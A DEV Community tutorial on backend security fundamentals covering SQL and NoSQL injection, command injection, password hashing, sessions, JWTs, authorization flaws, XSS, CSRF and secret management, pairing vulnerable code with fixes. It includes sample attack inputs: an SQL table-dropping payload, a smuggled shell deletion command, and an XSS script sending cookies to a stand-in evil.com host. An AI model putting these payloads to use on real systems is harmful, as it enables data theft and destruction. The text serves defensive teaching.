DEV Community: MAINAK MUKHRJEE The latest articles on DEV Community by MAINAK MUKHRJEE (@mainak_mukhrjee_24f83e347). https://dev.to/mainak_mukhrjee_24f83e347 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2473134%2F916a738b-4465-4b52-a551-39b0204dc251.png DEV Community: MAINAK MUKHRJEE https://dev.to/mainak_mukhrjee_24f83e347 en Backend Security Fundamentals (Modern Guide for Engineers) MAINAK MUKHRJEE Sat, 14 Mar 2026 07:44:55 +0000 https://dev.to/mainak_mukhrjee_24f83e347/backend-security-fundamentals-modern-guide-for-engineers-b47 https://dev.to/mainak_mukhrjee_24f83e347/backend-security-fundamentals-modern-guide-for-engineers-b47 <p>Security is not a feature added after development. It is a design principle applied throughout system architecture, coding, and deployment.</p> <p>Modern backend systems interact with browsers, databases, operating systems, APIs, and third-party services. Each interaction creates a <strong>trust boundary</strong>, and vulnerabilities appear when <strong>untrusted data crosses these boundaries without validation or control</strong>.</p> <p>This guide explains the most important backend security concepts, how they are exploited, and how to prevent them using modern practices used in production systems.</p> <h2> Security Mindset: Think Like an Attacker </h2> <p>Attackers do not care about your framework or programming language. Their main question is:</p> <p>What assumption did the developer make that I can break?</p> <p>Common developer assumptions:</p> <ul> <li>Users send valid input</li> <li>Requests only come from the frontend</li> <li>API parameters will not be modified</li> <li>IDs cannot be guessed</li> <li>Cookies cannot be stolen</li> </ul> <p>Attackers systematically break these assumptions.</p> <p>When writing backend code, ask:</p> <ol> <li>Where does user input enter the system?</li> <li>Which system will interpret this input?</li> <li>Can the input change the meaning of code or commands?</li> </ol> <h2> Injection Attacks </h2> <p>Injection vulnerabilities occur when <strong>user input is interpreted as executable code instead of plain data</strong>.</p> <p>Backend systems interact with multiple languages:</p> <ul> <li>SQL for database queries</li> <li>Shell commands for OS operations</li> <li>HTML and JavaScript for browser rendering</li> <li>JSON APIs</li> <li>XML or LDAP queries</li> </ul> <p>If user input crosses these contexts improperly, injection attacks occur.</p> <h2> SQL Injection </h2> <p>SQL Injection occurs when user input is directly concatenated into SQL queries.</p> <h3> Vulnerable Example </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">"</span><span class="s2">/login</span><span class="dl">"</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">email</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="s2">`SELECT * FROM users WHERE email='</span><span class="p">${</span><span class="nx">email</span><span class="p">}</span><span class="s2">'`</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="nx">query</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">result</span><span class="p">.</span><span class="nx">rows</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>If an attacker sends:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="s1">' OR '</span><span class="mi">1</span><span class="s1">'='</span><span class="mi">1</span> </code></pre> </div> <p>The query becomes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">OR</span> <span class="s1">'1'</span><span class="o">=</span><span class="s1">'1'</span> </code></pre> </div> <p>This condition is always true, returning all users.</p> <h3> Destructive Injection </h3> <p>Attackers can also execute multiple SQL commands.</p> <p>Input:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="s1">'; DROP TABLE users; -- </span></code></pre> </div> <p>Resulting query:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span><span class="p">;</span> <span class="k">DROP</span> <span class="k">TABLE</span> <span class="n">users</span><span class="p">;</span> </code></pre> </div> <p>This deletes the entire table.</p> <h2> SQL Injection Prevention </h2> <p>Always use parameterized queries.</p> <h3> Secure Example </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">SELECT * FROM users WHERE email = $1</span><span class="dl">"</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="nx">query</span><span class="p">,</span> <span class="p">[</span><span class="nx">email</span><span class="p">]);</span> </code></pre> </div> <p>Benefits:</p> <ul> <li>Query structure is separated from data</li> <li>User input cannot change SQL logic</li> <li>Prevents execution of injected SQL</li> </ul> <p>Additional practices:</p> <ul> <li>Use ORM frameworks (Prisma, Sequelize, TypeORM)</li> <li>Apply strict input validation</li> <li>Restrict database permissions</li> </ul> <h2> NoSQL Injection </h2> <p>NoSQL databases are also vulnerable.</p> <h3> Vulnerable Code </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findOne</span><span class="p">({</span> <span class="na">email</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">email</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">password</span> <span class="p">});</span> </code></pre> </div> <p>Attacker input:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"$ne"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">},</span><span class="w"> </span><span class="nl">"password"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"$ne"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The query becomes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="n">email</span> <span class="o">!=</span> <span class="k">null</span> <span class="k">AND</span> <span class="n">password</span> <span class="o">!=</span> <span class="k">null</span> </code></pre> </div> <p>Authentication may succeed.</p> <h3> Prevention </h3> <ul> <li>Validate request schemas</li> <li>Reject operators from user input</li> <li>Use schema validation libraries like Zod or Joi</li> </ul> <h2> Command Injection </h2> <p>Command injection occurs when user input is passed into shell commands.</p> <h3> Vulnerable Example </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">exec</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">child_process</span><span class="dl">"</span><span class="p">);</span> <span class="nf">exec</span><span class="p">(</span><span class="s2">`ffmpeg -i input.mp4 </span><span class="p">${</span><span class="nx">filename</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> </code></pre> </div> <p>If attacker sends:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>output.mp4<span class="p">;</span> <span class="nb">rm</span> <span class="nt">-rf</span> / </code></pre> </div> <p>Command becomes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ffmpeg <span class="nt">-i</span> input.mp4 output.mp4<span class="p">;</span> <span class="nb">rm</span> <span class="nt">-rf</span> / </code></pre> </div> <p>This can delete server files.</p> <h3> Prevention </h3> <p>Use argument arrays instead of shell execution.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">spawn</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">child_process</span><span class="dl">"</span><span class="p">);</span> <span class="nf">spawn</span><span class="p">(</span><span class="dl">"</span><span class="s2">ffmpeg</span><span class="dl">"</span><span class="p">,</span> <span class="p">[</span><span class="dl">"</span><span class="s2">-i</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">input.mp4</span><span class="dl">"</span><span class="p">,</span> <span class="nx">filename</span><span class="p">]);</span> </code></pre> </div> <p>User input is passed as data, not interpreted as shell commands.</p> <h2> Authentication Security </h2> <p>Authentication verifies who the user is.</p> <p>Weak authentication enables account takeover, data theft, and financial fraud.</p> <h2> Password Storage </h2> <h3> Incorrect Approach </h3> <p>Storing plaintext passwords.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">password</span><span class="pi">:</span> <span class="s2">"</span><span class="s">123456"</span> </code></pre> </div> <p>If the database leaks, all accounts are compromised.</p> <h2> Password Hashing </h2> <p>Passwords must be hashed.</p> <p>Example using bcrypt:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="nx">bcrypt</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">bcrypt</span><span class="dl">"</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">hashedPassword</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">bcrypt</span><span class="p">.</span><span class="nf">hash</span><span class="p">(</span><span class="nx">password</span><span class="p">,</span> <span class="mi">12</span><span class="p">);</span> </code></pre> </div> <p>Verification:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">valid</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">bcrypt</span><span class="p">.</span><span class="nf">compare</span><span class="p">(</span><span class="nx">password</span><span class="p">,</span> <span class="nx">storedHash</span><span class="p">);</span> </code></pre> </div> <h2> Salting </h2> <p>Hashing alone is vulnerable to rainbow table attacks.</p> <p>Salting adds randomness before hashing.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>password + randomSalt → hashedPassword </code></pre> </div> <p>Modern libraries like bcrypt and Argon2 automatically handle salts.</p> <p>Recommended algorithms:</p> <ul> <li>Argon2id</li> <li>bcrypt</li> <li>scrypt</li> </ul> <p>Avoid:</p> <ul> <li>MD5</li> <li>SHA256</li> </ul> <p>These are too fast for password protection.</p> <h2> Slow Hashing </h2> <p>Password hashing should be intentionally slow.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">bcrypt</span><span class="p">.</span><span class="nf">hash</span><span class="p">(</span><span class="nx">password</span><span class="p">,</span> <span class="mi">12</span><span class="p">)</span> </code></pre> </div> <p>Typical hashing delay:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>100–500 milliseconds </code></pre> </div> <p>This is acceptable for users but extremely expensive for brute-force attackers.</p> <h2> Session Management </h2> <p>After authentication, users should not re-enter passwords on every request.</p> <p>Sessions solve this.</p> <h3> Session Workflow </h3> <ol> <li>User logs in</li> <li>Server generates session ID</li> <li>Session stored in database or Redis</li> <li>Session ID stored in cookie</li> <li>Each request verifies the session</li> </ol> <p>Example cookie:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code><span class="n">session_id</span>=<span class="n">abc123xyz</span> </code></pre> </div> <h2> Secure Cookie Configuration </h2> <h3> HttpOnly </h3> <p>Prevents JavaScript access.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HttpOnly </code></pre> </div> <p>Protects against XSS token theft.</p> <h3> Secure </h3> <p>Ensures cookies are sent only via HTTPS.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Secure </code></pre> </div> <p>Prevents network interception.</p> <h3> SameSite </h3> <p>Controls cross-site cookie usage.</p> <p>Options:</p> <ul> <li>Strict</li> <li>Lax</li> <li>None</li> </ul> <p>Recommended:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code><span class="n">SameSite</span>=<span class="n">Lax</span> </code></pre> </div> <h2> JWT Authentication </h2> <p>JWT enables stateless authentication.</p> <p>Example payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"sub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"user123"</span><span class="p">,</span><span class="w"> </span><span class="nl">"role"</span><span class="p">:</span><span class="w"> </span><span class="s2">"admin"</span><span class="p">,</span><span class="w"> </span><span class="nl">"iat"</span><span class="p">:</span><span class="w"> </span><span class="mi">171234567</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The token is signed with a secret key.</p> <h3> JWT Security Concerns </h3> <ul> <li>Revocation is difficult</li> <li>Payload is readable (Base64 encoded)</li> <li>Token theft allows impersonation</li> </ul> <h3> Secure JWT Practices </h3> <ul> <li>short token expiration (5–15 minutes)</li> <li>refresh tokens</li> <li>store tokens in HttpOnly cookies</li> <li>rotate refresh tokens</li> </ul> <h2> Rate Limiting </h2> <p>Without rate limiting attackers can:</p> <ul> <li>brute force passwords</li> <li>overload servers</li> </ul> <h3> Rate Limiting Layers </h3> <p>Per IP:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>10 login attempts / minute </code></pre> </div> <p>Per account:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>5 failed attempts → temporary lock </code></pre> </div> <p>Global limits:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>100 login attempts per minute </code></pre> </div> <p>Common implementations:</p> <ul> <li>Redis counters</li> <li>API gateway limits</li> <li>Cloudflare protections</li> </ul> <h2> Authorization Security </h2> <p>Authentication verifies identity.</p> <p>Authorization determines what actions are allowed.</p> <p>Most backend breaches occur due to authorization mistakes.</p> <h2> Broken Object Level Authorization (BOLA) </h2> <p>Occurs when users access resources belonging to other users.</p> <p>Example endpoint:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">GET /orders/1002 </span></code></pre> </div> <h3> Vulnerable Query </h3> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">orders</span> <span class="k">WHERE</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1002</span> </code></pre> </div> <h3> Secure Query </h3> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">orders</span> <span class="k">WHERE</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1002</span> <span class="k">AND</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">currentUser</span> </code></pre> </div> <h2> Broken Function Level Authorization </h2> <p>Occurs when restricted functionality is exposed.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">GET /admin/users </span></code></pre> </div> <p>Protection:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">if </span><span class="p">(</span><span class="nx">user</span><span class="p">.</span><span class="nx">role</span> <span class="o">!==</span> <span class="dl">"</span><span class="s2">admin</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">403</span><span class="p">).</span><span class="nf">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">Forbidden</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Authorization Attack Types </h2> <h3> Horizontal Privilege Escalation </h3> <p>User accesses other users' data.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">/users/2/profile </span></code></pre> </div> <h3> Vertical Privilege Escalation </h3> <p>User gains higher privileges.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">/admin/deleteUser </span></code></pre> </div> <h2> Cross-Site Scripting (XSS) </h2> <p>XSS occurs when malicious JavaScript executes inside another user's browser.</p> <p>Example payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">https://evil.com/steal?cookie=</span><span class="dl">"</span> <span class="o">+</span> <span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Types of XSS </h3> <p>Stored XSS<br> Malicious script stored in database.</p> <p>Reflected XSS<br> Script embedded in URL parameters.</p> <p>DOM XSS<br> Client-side scripts manipulate unsafe data.</p> <h3> XSS Prevention </h3> <p>Escape user input:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nf">escapeHTML</span><span class="p">(</span><span class="nx">userInput</span><span class="p">)</span> </code></pre> </div> <p>Sanitize HTML using libraries like DOMPurify.</p> <p>Content Security Policy example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Content-Security-Policy: script-src 'self' </span></code></pre> </div> <h2> CSRF (Cross-Site Request Forgery) </h2> <p>CSRF tricks a browser into sending authenticated requests.</p> <p>Example attack:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST /transfer amount=1000 </span></code></pre> </div> <p>Browser automatically includes session cookies.</p> <h3> CSRF Protection </h3> <ul> <li>SameSite cookies</li> <li>CSRF tokens</li> <li>strict CORS rules</li> </ul> <p>Modern browsers mitigate many CSRF cases by default.</p> <h2> Security Misconfiguration </h2> <p>Many breaches occur due to configuration errors.</p> <h3> Secret Management </h3> <p>Never store secrets in source code.</p> <p>Incorrect:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">DB_PASSWORD</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">mypassword</span><span class="dl">"</span><span class="p">;</span> </code></pre> </div> <p>Correct:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DB_PASSWORD</span> </code></pre> </div> <p>Use secret managers such as:</p> <ul> <li>AWS Secrets Manager</li> <li>Hashicorp Vault</li> <li>GCP Secret Manager</li> </ul> <h3> Debug Mode in Production </h3> <p>Debug logs may expose:</p> <ul> <li>stack traces</li> <li>database queries</li> <li>credentials</li> </ul> <p>Always disable debug logging in production.</p> <h3> Security Headers </h3> <p>Important headers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Security-Policy X-Frame-Options Strict-Transport-Security X-Content-Type-Options </code></pre> </div> <p>Tools like Helmet.js configure these automatically.</p> <h2> Secure Backend Architecture Checklist </h2> <p>A strong security model uses multiple defensive layers.</p> <p>Key layers include:</p> <ol> <li>strict input validation</li> <li>parameterized database queries</li> <li>secure authentication</li> <li>strict authorization checks</li> <li>security headers</li> <li>monitoring and logging</li> <li>rate limiting</li> </ol> <h2> Interview Preparation: Key Questions </h2> <p>What is SQL Injection?<br> Injection of malicious SQL due to improper input handling. Prevention is parameterized queries.</p> <p>Authentication vs Authorization<br> Authentication verifies identity. Authorization determines permissions.</p> <p>Why use bcrypt or Argon2?<br> They are slow hashing algorithms designed to resist brute-force attacks.</p> <p>What is BOLA?<br> Broken Object Level Authorization allows users to access resources belonging to other users.</p> <p>Sessions vs JWT</p> <p>Sessions</p> <ul> <li>stateful</li> <li>server stores session data</li> <li>easy revocation</li> </ul> <p>JWT</p> <ul> <li>stateless</li> <li>client stores token</li> <li>harder revocation</li> </ul> <h2> Final Takeaway </h2> <p>Most backend vulnerabilities occur when <strong>data crosses trust boundaries without validation or access control</strong>.</p> <p>Always consider:</p> <ul> <li>Is this input trusted?</li> <li>What system will interpret it?</li> <li>What happens if the input is malicious?</li> </ul> <p>Security is not about memorizing attacks.<br> It is about designing systems that assume attackers exist.</p> architecture backend security tutorial